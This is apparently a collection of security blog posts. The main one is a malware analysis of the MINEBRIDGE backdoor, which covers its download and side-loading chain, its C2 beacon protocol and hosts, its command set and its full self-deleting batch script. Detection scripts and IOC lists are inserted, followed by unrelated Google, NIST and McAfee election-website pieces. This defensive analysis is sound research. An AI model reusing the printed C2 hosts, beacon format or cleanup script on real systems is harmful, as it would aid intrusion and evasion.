Successful detonation of the previously detailed malicious document results in creation of “uCWOncHvBb.dll” via a call to URLDownloadToFileA to the URL hxxps://marendoger[.]com/team/rumba.php. The returned MINEDOOR-packed MINEBRIDGE sample is saved in the executing user’s AppData directory (e.g., C:\Users\username\AppData\Roaming\uCWOncHvBb.dll), and then subsequent execution of the DllRegisterServer export via invocation of “regsvr32.exe /s %AppData%\uCWOncHvBb.dll” occurs:

This will result in a ZIP file being retrieved from the URL hxxps://creatorz123[.]top/~files_tv/~all_files_m.bin using the Windows API URLDownloadToFileW. The ZIP file is written to %TEMP%, unzipped to the newly created directory %AppData%\Windows Media Player, and then deleted:

The ZIP file contains legitimate files required to execute a copy of TeamViewer, listed in the file creation area of the IOC section of this post. When a file named TeamViewer.exe is identified while unzipping, it is renamed to wpvnetwks.exe:

After completing these tasks, uCWOncHvBb.dll moves itself to %AppData%\Windows Media Player\msi.dll. The phishing macro then closes the handle to msi.dll, and calls CreateProcessA on wpvnetwks.exe, which results in the renamed TeamViewer instance side-loading the malicious msi.dll located alongside it. The malware ensures its persistence through reboot by creating a link file at %CSIDL_STARTUP%\Windows WMI.lnk, which points to %AppData%\Windows Media Player\wpnetwks.exe, resulting in its launch at user logon.

The end result is a legitimate, though outdated (version 11, compiled on September 17, 2018, at 10:30:12 UTC), TeamViewer instance hijacked by a malicious sideloaded DLL (MINEBRIDGE).

MINEBRIDGE is a 32-bit C++ backdoor designed to be loaded by an older, unpatched instance of the legitimate remote desktop software TeamViewer by DLL load-order hijacking. The backdoor hooks Windows APIs to prevent the victim from seeing the TeamViewer application. By default, MINEBRIDGE conducts command and control (C2) communication via HTTPS POST requests to hard-coded C2 domains. The POST requests contain a GUID derived from the system’s volume serial number, a TeamViewer unique id and password, username, computer name, operating system version, and beacon interval. MINEBRIDGE can also communicate with a C2 server by sending TeamViewer chat messages using a custom window procedure hook. Collectively, the two C2 methods support commands for downloading and executing payloads, downloading arbitrary files, self-deletion and updating, process listing, shutting down and rebooting the system, executing arbitrary shell commands, process elevation, turning on/off TeamViewer's microphone, and gathering system UAC information.

MINEBRIDGE’s default method of communication is sending HTTPS POST requests over TCP port 443. This method of communication is always active; however, the beacon-interval time may be changed via a command. Before sending any C2 beacons, the sample waits to collect the TeamViewer-generated unique id (<tv_id>) and password (<tv_pass>) via SetWindowTextW hooks.

This specific sample continuously sends an HTTP POST request over TCP port 443 with the URI ~f83g7bfiunwjsd1/g4t3_indata.php to each host listed below until a response is received.

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top

The POST body contains the formatted string uuid=<guid>&id=<tv_id>&pass=<tv_pass>&username=<user_name>&pcname=<comp_name>&osver=<os_version>&timeout=<beacon_interval> where <guid> is a GUID derived from the system's volume serial number and formatted using the format string %06lX-%04lX-%04lX-%06lX. Additionally, the request uses the hard-coded HTTP User-Agent string "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

After a response is received, it's processed for commands. A single response may contain multiple commands. For each command executed, the sample sends an HTTPS POST request over TCP port 443 indicating success or failure. The sample responds to the commands below.
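Because the URI, User-Agent and POST body layout are hard-coded, each is an indicator on its own, and the body format survives a change of C2 domain. The block below is an added example (not FireEye code): it scores requests from a constructed proxy log against the five C2 hosts, the URI, the User-Agent, and a body parser that requires exactly the `uuid=…&id=…&pass=…&username=…&pcname=…&osver=…&timeout=…` field order with a `uuid` matching the `%06lX-%04lX-%04lX-%06lX` shape. The log line format, the client IPs, the `unknown-host.example.test` domain and the beacon field values are all made up for the demonstration.

```python
"""Score proxy-log requests against the hard-coded MINEBRIDGE beacon indicators."""
import re
from urllib.parse import urlparse

# Indicators from the post (defanged there; undefanged here so they can be compared).
C2_HOSTS = {"123faster.top", "conversia91.top", "fatoftheland.top",
            "creatorz123.top", "compilator333.top"}
C2_URI = "/~f83g7bfiunwjsd1/g4t3_indata.php"
C2_USER_AGENT = ("Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) "
                 "AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1")
BODY_FIELDS = ["uuid", "id", "pass", "username", "pcname", "osver", "timeout"]
# %06lX-%04lX-%04lX-%06lX: upper-case hex groups of 6, 4, 4 and 6 digits.
GUID_RE = re.compile(r"^[0-9A-F]{6}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{6}$")

# Constructed log line format: <time> <client> <method> <url> ua="..." body="..."
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) '
                    r'ua="(?P<ua>[^"]*)" body="(?P<body>[^"]*)"$')


def parse_beacon_body(body):
    """Return the beacon fields if the body has exactly MINEBRIDGE's layout, else None."""
    pairs = [p.split("=", 1) for p in body.split("&")]
    if any(len(p) != 2 for p in pairs) or [k for k, _ in pairs] != BODY_FIELDS:
        return None
    fields = dict(pairs)
    if not GUID_RE.match(fields["uuid"]) or not fields["timeout"].isdigit():
        return None
    return fields


def score_request(method, url, user_agent, body):
    """List every MINEBRIDGE indicator one request matches (empty list means clean)."""
    parsed = urlparse(url)
    hits = []
    if parsed.hostname in C2_HOSTS:
        hits.append("c2-host")
    if parsed.path == C2_URI:
        hits.append("c2-uri")
    if user_agent == C2_USER_AGENT:
        hits.append("c2-user-agent")
    if method == "POST" and parse_beacon_body(body) is not None:
        hits.append("beacon-body")
    return hits


def detect(log_lines):
    """Return (client, url, hits) for each parseable line matching at least one indicator."""
    alerts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = score_request(m["method"], m["url"], m["ua"], m["body"])
        if hits:
            alerts.append((m["src"], m["url"], hits))
    return alerts


# Constructed sample log: a beacon to a listed C2, the same beacon shape sent to an unknown
# host (the case the body check exists for), and two ordinary browser requests.
BEACON_BODY = ("uuid=1A2B3C-0D4E-5F60-7A8B9C&id=123456789&pass=abcd12"
               "&username=jdoe&pcname=WS01&osver=10.0&timeout=300")
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0) Firefox/72.0"
SAMPLE_LOG = [
    f'2020-01-07T16:20:01Z 10.0.0.5 POST https://creatorz123.top{C2_URI} '
    f'ua="{C2_USER_AGENT}" body="{BEACON_BODY}"',
    f'2020-01-07T16:25:01Z 10.0.0.5 POST https://unknown-host.example.test/~x/indata.php '
    f'ua="{C2_USER_AGENT}" body="{BEACON_BODY}"',
    f'2020-01-07T16:25:30Z 10.0.0.9 GET https://www.example.test/ ua="{BROWSER_UA}" body=""',
    f'2020-01-07T16:26:00Z 10.0.0.9 POST https://www.example.test/login '
    f'ua="{BROWSER_UA}" body="user=jdoe&pw=x"',
]

if __name__ == "__main__":
    for client, url, hits in detect(SAMPLE_LOG):
        print(f"{client} -> {url}: {', '.join(hits)}")
```

The second sample line is the one worth noting: neither the host nor the URI is on the list, yet the request still fires on the User-Agent and the body layout, which is why the structural indicators deserve their own rules rather than living only in a domain blocklist. In production the body check needs a proxy that logs POST bodies (or TLS inspection), so the User-Agent rule is the one most environments can run immediately.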

| Command | Description |
|---|---|
| drun | Download and execute an executable from a URL provided in the command. File saved to %TEMP%\<32_rand_chars>.exe. |
| rundll_command | Download a custom XOR-encoded and LZNT1 compressed DLL from a URL provided in the command and save to %TEMP%\<32_rand_chars>. Decode, decompress, and load the DLL in memory and call its entrypoint. |
| update_command | Move sample file to <sample_name>.old and download a new version of itself to <sample_name> where <sample_name> is the name of this sample (i.e., msi.dll). Relaunch the hosting TeamViewer application with command-line argument COM1_. Delete <sample_name>.old. |
| restart_command | Relaunch the hosting TeamViewer application with command-line argument COM1_. |
| terminate_command | Terminate the hosting TeamViewer application. |
| kill_command | Create and execute the self-deleting batch script tvdll.cmd to delete all unzipped files as well as the sample file. Terminate the hosting TeamViewer application. |
| poweroff_command | Shutdown the system. |
| reboot_command | Reboot the system. |
| setinterval_command | Update the C2 beacon-interval time. |

After executing all commands in the response, the sample sleeps for the designated C2 beacon-interval time. It repeats the process outlined above to send the next C2 beacon. This behavior repeats indefinitely.

The self-deleting batch script tvdll.cmd contains the following content, where <renamed_TeamViewer> is the renamed TeamViewer executable (i.e., wpvnetwks.exe) and <sample_name> is the name of this sample (i.e., msi.dll).

@echo off
ping 1.1.1.1 -n 1 -w 5000 > nul
goto nosleep1
:redel1
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep1
attrib -a -h -s -r %~d0%~p0TeamViewer_Resource_en.dll
del /f /q %~d0%~p0TeamViewer_Resource_en.dll
if exist  "%~d0%~p0TeamViewer_Resource_en.dll" goto redel1
goto nosleep2
:redel2
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep2
attrib -a -h -s -r %~d0%~p0TeamViewer_StaticRes.dll
del /f /q %~d0%~p0TeamViewer_StaticRes.dll
if exist  "%~d0%~p0TeamViewer_StaticRes.dll" goto redel2
goto nosleep3
:redel3
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep3
attrib -a -h -s -r %~d0%~p0TeamViewer_Desktop.exe
del /f /q %~d0%~p0TeamViewer_Desktop.exe
if exist  "%~d0%~p0TeamViewer_Desktop.exe" goto redel3
goto nosleep4
:redel4
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep4
attrib -a -h -s -r %~d0%~p0TeamViewer.ini
del /f /q %~d0%~p0TeamViewer.ini
if exist  "%~d0%~p0TeamViewer.ini" goto redel4
goto nosleep5
:redel5
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep5
attrib -a -h -s -r %~d0%~p0<sample_name>
del /f /q %~d0%~p0<sample_name>
if exist  "%~d0%~p0<sample_name>" goto redel5
goto nosleep6
:redel6
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep6
attrib -a -h -s -r %~d0%~p0<renamed_TeamViewer>
del /f /q %~d0%~p0<renamed_TeamViewer>
if exist  "%~d0%~p0<renamed_TeamViewer>" goto redel6
attrib -a -h -s -r %0
del /f /q %0

Possible Connection to Another Intrusion Set

The identified MINEBRIDGE samples have been packed within a loader we call MINEDOOR. Since Fall 2019, we’ve observed a group publicly tracked as TA505 conducting phishing campaigns that use MINEDOOR to deliver the FRIENDSPEAK backdoor. The combination of MINEDOOR and FRIENDSPEAK has also been publicly discussed using the name Get2.

The limited overlap in tactics, techniques, and procedures (TTPs) between campaigns delivering MINEBRIDGE and those delivering FRIENDSPEAK may suggest that MINEDOOR is not exclusive to TA505. Recent campaigns delivering FRIENDSPEAK have appeared to use spoofed sender addresses, Excel spreadsheets with embedded payloads, and campaign-specific domains that masquerade as common technology services. Meanwhile, the campaigns delivering MINEBRIDGE have used actor-controlled email addresses, malicious Word documents that download payloads from a remote server, and domains with a variety of themes sometimes registered weeks in advance of the campaign. The campaigns delivering MINEBRIDGE also appear to be significantly smaller in both volume and scope than the campaigns delivering FRIENDSPEAK. Finally, we observed campaigns delivering MINEBRIDGE on Eastern Orthodox Christmas when Russian-speaking actors are commonly inactive; we did not observe campaigns delivering FRIENDSPEAK during the week surrounding the holiday and language resources in the malware may suggest TA505 actors speak Russian.

It is plausible that these campaigns represent a subset of TA505 activity. For example, they may be operations conducted on behalf of a specific client or by a specific member of the broader threat group. Both sets of campaigns used domains that were registered with Eranet and had the registrant location “JL, US” or “Fujian, CN”; however, this overlap is less notable because we suspect that TA505 has used domains registered by a service that reuses registrant information.

Post-compromise activity would likely reveal whether these campaigns were conducted by TA505 or a second threat group; however, FireEye has not yet observed any instances in which a host has been successfully compromised by MINEBRIDGE. As such, FireEye currently clusters this activity separately from what the public tracks as TA505.

Acknowledgments

FireEye would like to thank all the dedicated authors of open source tooling and research referenced in this blog post. Further, FireEye would like to thank TeamViewer for their collaboration with us on this matter. The insecure DLL loading highlighted in this blog post was resolved in TeamViewer 11.0.214397, released on October 22, 2019, prior to the TeamViewer team receiving any information from FireEye. Additionally, TeamViewer is working to add further mitigations for the malware’s functionality. FireEye will update this post with further data from TeamViewer when this becomes available.

Indicators of Compromise (IOCs)

Suspicious Behaviors
  • Process lineage: Microsoft Word launching TeamViewer
  • Directory Creation: %APPDATA%\Windows Media Player
  • File Creation:
    • %APPDATA%\Windows Media Player\msi.dll
    • %APPDATA%\Windows Media Player\msi.dll.old
    • %APPDATA%\Windows Media Player\tvdll.cmd
    • %APPDATA%\Windows Media Player\wpvnetwks.exe
    • %APPDATA%\Windows Media Player\TeamViewer_Resource_en.dll
    • %APPDATA%\Windows Media Player\TeamViewer_StaticRes.dll
    • %APPDATA%\Windows Media Player\TeamViewer_Desktop.exe
    • %APPDATA%\Windows Media Player\TeamViewer.ini
    • %CSIDL_STARTUP%\Windows WMI.lnk
    • %CSIDL_PROFILE%\<dll_name>.xpdf
    • %TEMP%\<32 random characters>
    • %TEMP%\<32 random characters>.exe
    • %TEMP%\~8426bcrtv7bdf.bin
  • Network Activity:
    • HTTPS Post requests to C2 URLs
    • User-Agent String: "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"
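The suspicious behaviors above can be turned directly into detection logic. The following is an added example, not FireEye's code: it applies rules derived from the IOC list (the Word-to-TeamViewer process lineage, the dropped file names, the COM1_ relaunch argument, and the beacon User-Agent) to constructed Sysmon-style events; the event field names and the user profile path are assumptions.

```python
"""Rules derived from the MINEBRIDGE suspicious-behaviour list, applied to
Sysmon-style events. Added example, not FireEye's code: the event field
names and the user profile path are assumptions, and the sample events
below are constructed."""
import ntpath
import re

# %APPDATA%\Windows Media Player, matched on the directory for any user profile.
MEDIA_PLAYER_DIR = re.compile(
    r"\\appdata\\roaming\\windows media player$", re.IGNORECASE)
# File names the post lists under that directory.
DROPPED_FILES = {
    "msi.dll", "msi.dll.old", "tvdll.cmd", "wpvnetwks.exe",
    "teamviewer_resource_en.dll", "teamviewer_staticres.dll",
    "teamviewer_desktop.exe", "teamviewer.ini",
}
# Remaining file artifacts from the IOC list.
STARTUP_LNK = re.compile(r"\\startup\\windows wmi\.lnk$", re.IGNORECASE)
TEMP_BIN = re.compile(r"\\temp\\~8426bcrtv7bdf\.bin$", re.IGNORECASE)
PROFILE_XPDF = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.xpdf$", re.IGNORECASE)
# Hard-coded beacon User-Agent: an iPhone string sent from a Windows host.
MINEBRIDGE_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) "
                 "AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 "
                 "Mobile/15B150 Safari/604.1")


def check_event(ev):
    """Return the names of every MINEBRIDGE rule a single event matches."""
    hits = []
    kind = ev.get("event")
    if kind == "process_create":
        image = ev.get("image", "")
        in_drop_dir = bool(MEDIA_PLAYER_DIR.search(ntpath.dirname(image)))
        # Process lineage: Word launching the (renamed) TeamViewer binary.
        if ntpath.basename(ev.get("parent_image", "")).lower() == "winword.exe" and (
                in_drop_dir or ntpath.basename(image).lower() in DROPPED_FILES):
            hits.append("word_launches_teamviewer")
        # update_command / restart_command relaunch TeamViewer with COM1_.
        if in_drop_dir and "COM1_" in ev.get("command_line", "").split():
            hits.append("teamviewer_relaunch_com1")
    elif kind in ("file_create", "dir_create"):
        target = ev.get("target", "")
        name = ntpath.basename(target).lower()
        if kind == "dir_create" and MEDIA_PLAYER_DIR.search(target):
            hits.append("media_player_dir_created")
        elif MEDIA_PLAYER_DIR.search(ntpath.dirname(target)) and name in DROPPED_FILES:
            hits.append("media_player_file_drop")
        if STARTUP_LNK.search(target):
            hits.append("startup_lnk_persistence")
        if TEMP_BIN.search(target) or PROFILE_XPDF.match(target):
            hits.append("minebridge_scratch_file")
    elif kind == "network":
        if (ev.get("method") == "POST" and ev.get("scheme") == "https"
                and ev.get("user_agent") == MINEBRIDGE_UA):
            hits.append("minebridge_beacon_ua")
    return hits


def scan(events):
    """Return (event index, rule name) pairs for every rule hit in the list."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample telemetry: the profile path and hosts are made up; only
# the directory, file names, COM1_ argument and User-Agent come from the post.
APPDATA = r"C:\Users\alice\AppData\Roaming"
DROP = APPDATA + r"\Windows Media Player"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
TV = DROP + r"\wpvnetwks.exe"   # renamed TeamViewer binary
SAMPLE_EVENTS = [
    {"event": "dir_create", "target": DROP},
    {"event": "file_create", "target": DROP + r"\msi.dll"},
    {"event": "file_create", "target": TV},
    {"event": "process_create", "image": TV, "parent_image": WORD,
     "command_line": f'"{TV}"'},
    {"event": "file_create", "target": APPDATA
     + r"\Microsoft\Windows\Start Menu\Programs\Startup\Windows WMI.lnk"},
    {"event": "file_create", "target": r"C:\Users\alice\msi.dll.xpdf"},
    {"event": "file_create",
     "target": r"C:\Users\alice\AppData\Local\Temp\~8426bcrtv7bdf.bin"},
    {"event": "process_create", "image": TV, "parent_image": TV,
     "command_line": f'"{TV}" COM1_'},
    {"event": "network", "method": "POST", "scheme": "https",
     "host": "c2.invalid", "user_agent": MINEBRIDGE_UA},
    # Benign noise: a normal browser request, and Word started from Explorer.
    {"event": "network", "method": "GET", "scheme": "https", "host": "example.com",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/72.0"},
    {"event": "process_create", "image": WORD,
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "WINWORD.EXE"},
]


def scan_sample():
    """Run the rules over the constructed sample and return the hit list."""
    return scan(SAMPLE_EVENTS)


if __name__ == "__main__":
    for index, rule in scan_sample():
        print(f"event {index}: {rule}")
```

Several of these artifacts (the iPhone User-Agent on a Windows host, the COM1_ argument, the .xpdf file in the profile root) are individually weak signals; the value is in correlating them on one host within a short window.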

C2 Domains

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top

Download Domains

  • neurogon[.]com
  • tiparcano[.]com
  • seigortan[.]com
  • marendoger[.]com
  • badiconreg[.]com

Sender Domains

  • pt-cpaaccountant[.]com
  • rogervecpa[.]com
  • agent4career[.]com
  • bestrecruitments[.]com

Phishing Documents


MINEBRIDGE/MINEDOOR Samples


Google software glitch sent some users’ videos to strangers

Bug affected users of Google Takeout exporting from Google Photos in late November

Google has said a software bug resulted in some users’ personal videos being emailed to strangers.

The flaw affected users of Google Photos who requested to export their data in late November. For four days the export tool wrongly added videos to unrelated users’ archives.


NIST Offers Strategies to Help Businesses Secure Their Cyber Supply Chains

Reducing the cybersecurity risk to one of the most vulnerable aspects of commerce — global supply chains — is the goal of a new publication by the National Institute of Standards and Technology (NIST), whose computer security experts have distilled a set of effective risk management techniques into a draft guidebook for businesses. NIST is seeking public comment on the draft for the next 30 days. Key Practices in Cyber Supply Chain Risk Management (Draft NISTIR 8276) provides a set of strategies to help businesses address the cybersecurity issues posed by modern information and communications

Election Website Security: Protect Your Vote in 2020

The 2020 U.S. presidential primaries are right around the corner. As people gear up to cast their ballots for party candidates, they may not realize that website security shortcomings could leave the U.S. elections susceptible to digital disinformation campaigns, or possibly worse, seeking to influence and/or manipulate the democratic process.

McAfee recently conducted a survey of county websites and county election administration websites in the 13 states projected as battleground or “tossup” states in the U.S. presidential elections in November. According to the survey results, the majority of these websites lacked official U.S. government .GOV website validation and HTTPS website security measures to prevent hackers from launching fake websites disguised as legitimate county government sites.

Got .GOV?

You might be wondering what the significance of a .gov website domain is. Well, a .gov website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

On the other hand, a website using a .COM, .NET, .ORG, or .US can be purchased by anyone with a credit card from any number of legitimate website domain vendors. The lack of a .GOV in a website name means that no controlling government authority has validated that the website is a legitimate government site.

HTTPS: browse the web securely

In the same vein as a .GOV web domain, HTTPS and a lock icon in the address of a website helps establish its validity. When a visitor sees these icons, it means that their browser has made a secure connection with the website, which means the website and the user can be confident of who they are sharing information with.

This means that any personal voter registration information that a user shares with the site cannot be intercepted and stolen by hackers while they are on the site. Additionally, HTTPS and a lock icon tell the user that they cannot be re-routed without their knowledge to a different site.

How this could impact elections

Hackers typically look to carry out their attacks with the least amount of effort and the fewest resources. Instead of hacking into local voting systems and changing vote counts, hackers could conduct a digital disinformation campaign to influence voter behavior during the elections. These attacks would seek to suppress or disrupt the voting process by setting up bogus websites with official sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.

Example disinformation email:

On top of that, social media promotions could be used to lure voters to the fake websites and provide them with the same false information.

By telling voters that they should register to vote in the wrong places, or merely vote at the wrong times, the hackers could misdirect, confuse, and frustrate voters on election day. This could ultimately impact vote counts or at least undermine voter confidence in the electoral process.

Survey results

McAfee’s survey of the external security measures for county election websites included Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

Our research found that Minnesota and Texas ranked the lowest among the surveyed states in terms of .GOV county coverage with 4.6% and 5.1% coverage respectively. Arizona ranked the highest in .GOV county coverage with 66.7%. Yet, this still left a third of the state’s counties uncovered.

Texas ranked the lowest in terms of HTTPS protection with only 22.8% of its county websites protected. Arizona again led in county HTTPS protection with 80.0%, followed by Nevada (75.0%), Iowa (70.7%), Michigan (65.1%), and Wisconsin (63.9%). Again, these “leader” states still lacked HTTPS coverage for approximately a third of their counties.

Tips to help secure your vote

So, what can citizens do to help protect their votes and the electoral system overall leading up to the 2020 election? Check out these tips to securely cast your ballot:

  • Stay informed. Remind yourself to confirm that the site you are visiting is a .GOV website and that HTTPS security protection is in place, to ensure that the information is accurate and safe.
  • Look out for suspicious emails. Carefully scrutinize all election-related emails. An attacker seeking to misinform can use phishing techniques to accomplish their objective. McAfee’s general warnings related to phishing emails (e.g. here), where an attacker can create emails that look as if they come from legitimate sources, are applicable.
  • Go directly to the source. If in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day.
  • Keep it old school. Trust the official voting literature sent through the traditional mail first, as the U.S. Postal Service is the primary channel state and local governments use to send out voting information.

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election Website Security: Protect Your Vote in 2020 appeared first on McAfee Blogs.

U.S. Battleground County Website Security Survey

Today McAfee released the results of a survey of county websites and county election administration websites in the 13 states projected as battleground states in the 2020 U.S. presidential elections. We found that significant majorities of these websites lacked the official government .GOV website validation and HTTPS website security measures to prevent malicious actors from launching copycat web domains posing as legitimate county government sites.

These shortcomings could make it possible for malicious actors to spread false and misleading election information through mass bulk email and website promotion campaigns that could suppress, misdirect, or otherwise disrupt Election Day proceedings in such a way that they could impact the number of votes cast and, ultimately, perhaps impact the results of the 2020 U.S. elections.

Why .GOV & HTTPS?

Whereas websites using .COM, .NET, .ORG, and .US in their names are easily accessible to anyone with a credit card from website domain vendors such as GoDaddy.com, acquiring a .GOV website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

The lack of .gov in a website name means that no controlling government authority has validated that the website in question is legitimate.

When website visitors see the HTTPS and a lock icon in the address of a website they are visiting, this means that their browser has made a secure connection with that website through a technology called Secure Sockets Layer (SSL). While SSL sounds technical, the security it delivers is easy to understand. These signifiers simply tell visitors that any personal voter registration information that they share with those websites is encrypted and cannot be intercepted and stolen by hackers while they are visiting the site.


Additionally, and more importantly to the election disinformation issue, they also tell visitors that they cannot be re-routed against their will from legitimate government websites to other websites pretending to be government websites.

What McAfee’s survey found

McAfee’s January 2020 survey researched states projected by U.S. election prognosticators to be pivotal in determining the victor in the 2020 Presidential Elections. States surveyed include Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

State counties lacking .GOV validation

Of the 1,117 counties in the survey group, 83.3% of their websites lack .GOV validation. Minnesota ranked the lowest among the surveyed states in terms of .GOV website validation with 95.4% of counties lacking U.S. government certification. Other states severely lacking in .GOV coverage included Texas (94.9%), New Hampshire (90.0%), Michigan (89.2%), Iowa (88.9%), Nevada (87.5%), and Pennsylvania (83.6%).

Arizona had the highest percentage of main county websites validated by .GOV with 66.7% coverage, but even this percentage suggests that a third of the Grand Canyon State’s county websites are unvalidated and that hundreds of thousands of voters could still be subjected to disinformation schemes.

State counties lacking HTTPS protection

McAfee’s survey found that 46.6% of county websites lack HTTPS encryption. Texas ranked the lowest in terms of encryption with 77.2% of its county websites failing to protect citizens visiting these web properties. Other states with counties lacking in encryption included Pennsylvania (46.3%), Minnesota (42.5%), and Georgia (38.4%).

Assessment of Iowa and New Hampshire

In Iowa, 88.9% of county websites lack .GOV validation, and as many as 29.3% lack HTTPS encryption. Ninety percent of New Hampshire’s county websites lack .GOV validation, and as many as 30% of the Granite State’s counties lack encryption.

Inconsistent naming standards

McAfee’s research found that some states attempted to establish naming standards, such as www.co.[county name].[two-letter state abbreviation].us. Unfortunately, these formats were followed so inconsistently that a voter seeking election information from her county website cannot be confident that a web domain following such a standard is indeed a legitimate site.

Easy-to-remember naming formats

McAfee found 103 cases in which counties set up easy-to-remember, user-friendly domain names to make their election information easier to remember and access for the broadest possible audience of citizens. Examples include www.votedenton.com, www.votestanlycounty.com, www.carrollcountyohioelections.gov, www.voteseminole.org, and www.worthelections.com. While 93 of these counties (90.2%) protected voters visiting these sites with encryption, only two validated these special domains and websites with .GOV. This suggests that malicious parties could easily set up numerous websites with similarly named domains to spoof these legitimate sites.
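The two checks the survey applies (.GOV validation and HTTPS), together with the www.co.[county name].[two-letter state abbreviation].us naming standard, can be expressed as a small classifier; the same logic also catches a name that merely contains .gov somewhere in the middle, the pattern the earlier post's .GOV/HTTPS discussion warns about. The block below is an added example, not McAfee's survey tooling: the URLs in the sample are constructed except where the post itself names them, and "example" counties are placeholders.

```python
"""Classify county website addresses by the survey's two checks (.GOV
validation and HTTPS) plus the www.co.[county].[st].us naming standard.
Added example, not McAfee's survey tooling; sample URLs are constructed
except for the domains the post itself names."""
import re
from urllib.parse import urlsplit

# Naming standard described in the post: www.co.[county name].[two-letter state].us
CO_STANDARD = re.compile(r"^www\.co\.[a-z0-9-]+\.[a-z]{2}\.us$")


def classify(url):
    """Return what a voter can verify from the address bar alone."""
    if "://" not in url:
        url = "http://" + url           # a bare name is reached over plain HTTP
    parts = urlsplit(url.strip().lower())
    host = parts.hostname or ""
    labels = host.split(".")
    return {
        "host": host,
        # Validated only when the registrable domain itself is under .gov ...
        "dot_gov": labels[-1] == "gov",
        # ... not when "gov" appears as an inner label of some other domain.
        "gov_lookalike": "gov" in labels[:-1],
        "https": parts.scheme == "https",
        "co_standard": bool(CO_STANDARD.match(host)),
    }


def coverage(sites):
    """Per-state percentage of counties with .GOV and with HTTPS, rounded to
    one decimal place the way the survey reports its figures."""
    totals = {}
    for state, url in sites:
        c = classify(url)
        t = totals.setdefault(state, {"n": 0, "gov": 0, "https": 0})
        t["n"] += 1
        t["gov"] += c["dot_gov"]
        t["https"] += c["https"]
    return {s: {"gov_pct": round(100 * t["gov"] / t["n"], 1),
                "https_pct": round(100 * t["https"] / t["n"], 1)}
            for s, t in totals.items()}


# Constructed sample (not survey data). "example" counties are placeholders;
# the other domains are the ones the post names.
SAMPLE_SITES = [
    ("OH", "https://www.boe.ohio.gov/vanwert/"),
    ("OH", "https://www.carrollcountyohioelections.gov"),
    ("OH", "http://www.co.example.oh.us"),
    ("TX", "www.votedenton.com"),
    ("TX", "https://www.co.example.tx.us"),
    ("TX", "http://example-county.org"),
]

if __name__ == "__main__":
    for state, url in SAMPLE_SITES:
        print(state, classify(url))
    print(coverage(SAMPLE_SITES))
```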

.GOV and elections

The lack of .gov matters because, without an official government body validating whether websites truly belong to the government entities they claim, it’s possible for malicious actors to spoof legitimate government sites with fraudulent websites.

If a malicious foreign actor can spoof government websites, he can send hundreds of thousands of emails to voters and use both those emails and the websites to which they are tied to send voters information on the wrong polling places, phony voter registration processes or requirements (barriers), or other incorrect voting instructions that could suppress, misdirect, or otherwise disrupt a key county’s electorate from voting.

If the malicious actor can launch such a digital disinformation campaign close enough to election day, he could reach a critical mass of voters. If he does so before county and state officials become aware of the campaign, it could be very difficult for the officials to counter the disinformation before voter behavior is impacted.

If the actor can successfully disrupt the voting behavior of just tens of thousands of citizens in these key states, their votes may not be counted or their confidence in the validity of election results and even legitimacy of the democratic process overall could be badly shaken.

Ultimately, if a malicious actor seeks to undermine confidence in America’s system of government, such a digital disinformation campaign can succeed in damaging confidence in the electoral process, even if he cannot succeed in impacting actual votes.

Ohio’s Strategy for transitioning to .GOV

While only 19.3% of Ohio’s 88 county main websites have .GOV validation, the state leads McAfee’s survey with 76.1% of county election websites and webpages validated by .GOV certification.

This leadership position appears to be the result of a state-led initiative to transition county election-related content to .GOV validated web properties. A majority of counties have subsequently transitioned their main county websites to .GOV domains, their election-specific websites to .GOV domains, or their election-specific webpages to Ohio’s own .GOV-validated https://ohio.gov/ domain (i.e. https://www.boe.ohio.gov/vanwert/). See here for a complete list of Ohio county election websites.

Such a .GOV transition strategy constitutes an interim solution until more comprehensive efforts are made at the state and federal government level through initiatives such as The DOTGOV Act of 2020. This legislation would require the Department of Homeland Security (DHS) to support .GOV adoption for local governments with technical guidance and financial support.

Please see the following for more information on this subject:


